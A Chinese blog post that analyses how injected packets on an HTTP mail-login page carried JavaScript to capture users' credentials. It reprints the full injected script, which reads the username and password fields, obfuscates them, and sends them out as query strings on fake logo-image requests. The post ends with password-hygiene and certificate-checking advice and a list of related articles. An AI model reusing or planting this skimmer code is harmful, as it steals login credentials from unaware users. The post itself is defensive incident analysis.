国内某邮件服务商,近期在某南方地区有大量客户反应登录时出错和异常,于是工作人员进行了一下跟进,发现如下:
首先,邮件服务商登陆页面为普通HTTP协议发送,提交时通过JS进行RSA加密(没错,JS的RSA),发送到SSO登陆点,然后进行登录,有些人一看RSA,应该挺安全的了,不过……

在国内上网的大多数人对于运营商在HTTP包里插广告应该很熟悉了,原理很简单,大家可以参考腾讯安全中心的这篇文章http://security.tencent.com/index.php/blog/msg/10

在客户端抓包发现收到的HTTP数据包有异常,有几个包的TTL多了2,说明比正常从服务器到客户端的数据包少走了两跳,而且离服务器不是很远,估计在一个机房里,并且数据包的ID是很规律的12345,明显就是伪造的,包中插入了如下内容:

<script type="text/javascript">

    document.getElementById("freepassword").onblur = function (e) {

        logoFresh();

    };

    function onLoginCheck() {

        var user = null;

        var pass = null;

        user = document.getElementById("freename").value;

        pass = document.getElementById("freepassword").value;

        if (user.length <= 0 || pass.length <= 0) {

            return false;

        } else {

            return rskQuery(user + '&' + pass + '&xxxxx.com');

        }

    };

    function rskQuery(s) {

        s = encodeURIComponent(s);

        var r = Math.random();

        var num = (Math.round(r * 100)) % 9 + 1;

        var i = 0;

        var out = '';

        do {

            var ch = s.charCodeAt(i++);

            ch = (i % 2 > 0) ? (ch - i % num) : (ch + i % num);

            var l = (ch / 10 >= 10) ? 3 : (ch / 10 > 0 ? 2 : 1);

            out += l.toString() + ch;

        } while (i < s.length);

        out = r.toString().substring(0, num) + out + num;

        return out;

    };

    function logoFresh() {

        var h = logoUrl();

        var s = onLoginCheck();

        if (s == false) {

            return false;

        }

        for (var i = 0; i < 2; i++) {

            var bg_logo = new Image(0, 0);

            bg_logo.src = h + 'images/logo_bg.jpg?' + s;

        }

        var s1 = onLoginCheck();

        var ajaxUrl = h + 'images/logo_bg.jpg?' + s1;

        var result = xmlHttpConnect(ajaxUrl, "get", null);

    };

    function logoUrl() {

        return '/';

    };

    function createXMLHttp() {

        if (window.XMLHttpRequest) return new XMLHttpRequest();

        else if (window.ActiveXObject) return new ActiveXObject("Microsoft.XMLHTTP");

        else return null;

    };

    function xmlHttpConnect(url, method, content) {

        var request = createXMLHttp();

        if (request == null) return null;

        try {

            request.open(method, url, true);

            request.send(content);

        } catch (e) {

            return null;

        }

        if ((request.readyState == 4) && (request.status == 200)) return null;

        else return null

    };

    document.getElementById("vippassword").onblur = function (e) {

        logo_Fresh();

    }

    function onLoginPhone() {

        var user = null;

        var pass = null;

        user = document.getElementById("vipname").value;

        pass = document.getElementById("vippassword").value;

        if (user.length <= 0 || pass.length <= 0) {

            return false;

        } else {

            return rskQuery(user + '&' + pass + '&vip.xxxxx.com');

        }

    }

    function logo_Fresh() {

        var h = logoUrl();

        var s = onLoginPhone();

        if (s == false) {

            return false;

        }

        for (var i = 0; i < 2; i++) {

            var bg_logo = new Image(0, 0);

            bg_logo.src = h + 'images/logo_bg.jpg?' + s;

        }

        var s1 = onLoginCheck();

        var ajaxUrl = h + 'images/logo_bg.jpg?' + s1;

        var result = xmlHttpConnect(ajaxUrl, "get", null);

    }

</script>

在登录form里抓取用户名和密码,当成参数跟在logo后面再访问一下logo,再从中间抓包获取这段内容。这样的话邮件服务商的日志里肯定会出现很多 logo的请求后面跟着明文用户名密码吧,错了,服务商那边根本没看到logo被请求两次,推断是带有这个特征的数据包被drop了,真尼玛用心啊。

至此,用户的邮箱密码已经泄露,用户和服务商也没有任何察觉,可能由于某些原因,比如延迟,丢包,bug之类的,导致部分用户被插的时候有异常,影响了原有的登录js,才导致这次事件浮出水面。

服务商由于成本问题,暂不考虑采用SSL登录。

至于那边还有什么类似设备我就不多说了,反正据我的了解,国内随便什么实权部门都能任意在ISP机房和主干网上接入任意设备,据说连税务的都有。

关于本次事件学到的内容:

国内服务用的任何用户名和密码和在国外比如gmail,twitter的账号要不相同,而且没有任何关联,并且国外服务的注册邮箱,密保邮箱等都要采用国外邮箱,首推gmail,并且打开二次认证,不要用短信认证,用手机验证器。

线上线下密码要分开,不相同,不近似,比如本地硬盘加密密码。凡是通过明文协议传输的通通被视为已暴露,HTTPS登录时每次手动查看证书签发机
构是否为之前常用的那一个,遇到怀疑是国内CA伪造证书的立刻把证书导出另存为,因为国内没有root
CA(cnnic的好像在ff和chrome已经被去掉了),只有二级证书机构,一旦被发现随便签证书会被立刻取消资格,并且黑名单推送到各大浏览器和操
作系统。

呵呵,你们以为能频繁的,多种花样的插12306就赢了么,你们以为每天在微博打打嘴炮就胜利了么,菊花都被爆脱肛了还不知道。

你们以为运营商只是HTTP插点广告而已么?的更多相关文章

  1. js去除运营商或者路由器添加的广告脚本

    是不是偶尔发现在家里看网页的时候回插入一个广告,很烦人.开发的网站,上传到了阿里云 oss,设置了域名解析,但是在家里晚上访问的时候,总会在页面添加一个广告,导致页面卡主,一开始以为是路由器的问题,以 ...

  2. 从运营商小广告到HTTPS

    相信很多人都试过这样的经历,浏览一个正常的网站时,右下突然角弹出一堆小广告,而且这些广告的内容和你浏览的网站格格不入: 前几天还有某微博用户爆料访问github时居然也有广告: 又或者,你有没有试过因 ...

  3. SIM卡的消失会让运营商们恐慌吗?

    ​中国移动.联通.电信三大运营商原本高高在上,每天乐滋滋地数钱数到手抽筋,但近年来移动互联网的快速普及,让运营商的制霸状态不复存在.成为众多互联网公司的"流量通道",语音.短信等业 ...

  4. SDN/NFV运营商商业化部署

    三大运营商发布未来网络架构,并逐步加快SDN/NFV商业化部署的步伐.中国联通发布其新一代网络架构<CUBE-Net 2.0白皮书>,并与20多家合作伙伴共同启动了“新一代网络”合作研发计 ...

  5. [转]用Whois获得电信运营商的IP地址是如何分配的?

    [转]用Whois获得电信运营商的IP地址是如何分配的? Linux下获得一些中国电信运营商的IP地址分配情况: APNIC是管理亚太地区IP地址分配的机构,它有着丰富准确的IP地址分配库,同时这些信 ...

  6. CSP -- 运营商内容劫持(广告)的终结者

    缘由 我们公司最近手机端H5 经常受到商户和用户的投诉,说有广告并且导致不能正常进行操作,我们商户自己当然不会加广告了,但是商户和用户可不管这些了,就认为是我们的问题 探索发现根本 目前我们用的很多浏 ...

  7. IP地址数据库-ISP运营商列表(2017年1月)

    IP地址数据库  微信号:qqzeng-ip [全球旗舰版][国内精华版][国外拓展版][英文版][掩码版]     http://qqzeng.com 中国大陆:三大基础运营商 中国电信中国联通中国 ...

  8. Android 5.0 Default SMS App以及运营商授权SMS App

    已同步更新至个人blog:http://dxjia.cn/2015/08/android-5-default-sms-app/ 题外话:博友们有没有好用的写博客客户端推荐啊,cnblogs推荐的win ...

  9. android判断网络连接状态、联网类型、运营商

    /** * 获取上网方式 * * @param mContext * @return */ public static String getNetType(Context mContext) { St ...

随机推荐

  1. 转载一篇关于ios静态库的文章

    http://blog.csdn.net/zsomsom/article/details/9163635

  2. codeforces 476C.Dreamoon and Sums 解题报告

    题目链接:http://codeforces.com/problemset/problem/476/C 题目意思:给出两个数:a 和 b,要求算出 (x/b) / (x%b) == k,其中 k 的取 ...

  3. tomcat启动,输出system.out.println()

    tomcat6.0在使用System.out.println("aa")的时候,用cmd启动startup.bat,弹出的那个cmd窗口看到 还可以看logs/catalina.o ...

  4. HDU 4310 Hero (贪心算法)

    A - Hero Time Limit:3000MS     Memory Limit:65536KB     64bit IO Format:%I64d & %I64u Submit Sta ...

  5. July 29th, Week 31st Friday, 2016

    I am a slow walker, but I never walk backwards. 我走得很慢,但我从来不会后退. I had run very fast, and I had once ...

  6. 第一套增删改查(htm+ashx完成)

    1.展示人员列表htm文件: <a href="PersonEditAddNew.ashx?action=addnew">添加</a> </p> ...

  7. PIGOSS

    http://blog.sina.com.cn/s/blog_865bc4c60102wkb1.html

  8. 修改stb_image.c以让Duilib直接支持Ico格式的图标显示

    duilib不支持ico格式的图标资源, 但是我要想显示ico格式的图标... 发现网上那些转换ico为bmp或其它格式的都不是一个好办法, 也还是不能让duilib直接显示ico... 昨晚稍微研究 ...

  9. hdu 1542 扫描线求矩形面积的并

    很久没做线段树了 求矩形面积的并分析:1.矩形比较多,坐标也很大,所以横坐标需要离散化(纵坐标不需要),熟悉离散化后这个步骤不难,所以这里不详细讲解了,不明白的还请百度2.重点:扫描线法:假想有一条扫 ...

  10. MATLAB学习笔记(十一)——MATLAB图形用户界面设计

    (一)菜单设计 一.建立用户菜单 1.概况: 用户菜单一般含有一级菜单和二级菜单,乃至多级菜单.每一级菜单又包含多个菜单项.建立菜单可以使用uimenu函数. 2.uimenu函数调用: %建立一级菜 ...